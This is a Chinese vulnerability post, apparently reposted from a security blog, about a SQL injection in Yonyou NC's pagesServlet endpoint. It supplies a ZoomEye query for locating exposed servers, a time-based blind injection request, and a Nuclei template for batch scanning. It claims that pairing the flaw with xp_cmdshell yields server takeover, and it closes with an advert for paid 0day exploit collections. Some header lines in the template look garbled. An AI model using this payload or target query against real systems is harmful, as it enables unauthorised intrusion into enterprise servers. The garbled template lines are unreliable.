0x01 产品简介
用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术,旨在帮助企业创新管理模式、引领商业变革。这里利用 ZoomEye搜索引擎直接输入关键字即可,影响资产7000+。
声明
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS: 末尾领取资料及福利-批量检测脚本在末尾(新增语雀漏洞库)
0x02 漏洞描述
攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
0x03 ZoomEye语法
app:"用友 UFIDA NC"
0x04 漏洞复现
POC
GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
id: yongyou-nc-pagesServlet-sqli
info:
name: yongyou-nc-pagesServlet-sqli
author: HackTwo
severity: high
description: other
http:
raw:
|
GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
gzip, deflate :
zh-CN,zh;q=0.9 :
Connection: close
matchers:
type: dsl
dsl:
"status_code==200 && duration>=5"
0x05 修复建议
官方已经推出新版本,建议升级到最新版
0x06 知识星球-V1.3
学习更多挖洞技巧可加入内部星球可获得内部工具和享受内部资源,包含网上一些付费漏洞扫描工具Fofa高级VIP等。详情直接点击下方链接进入了解,需要加入的直接点击下方链接了解即可,觉得价格高的师傅可后台回复” 星球 “有优惠券名额有限先到先得!内部包含网上需付费未公开的0day/1day漏洞库,后续资源会更丰富在加入还是低价!
原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/88711.html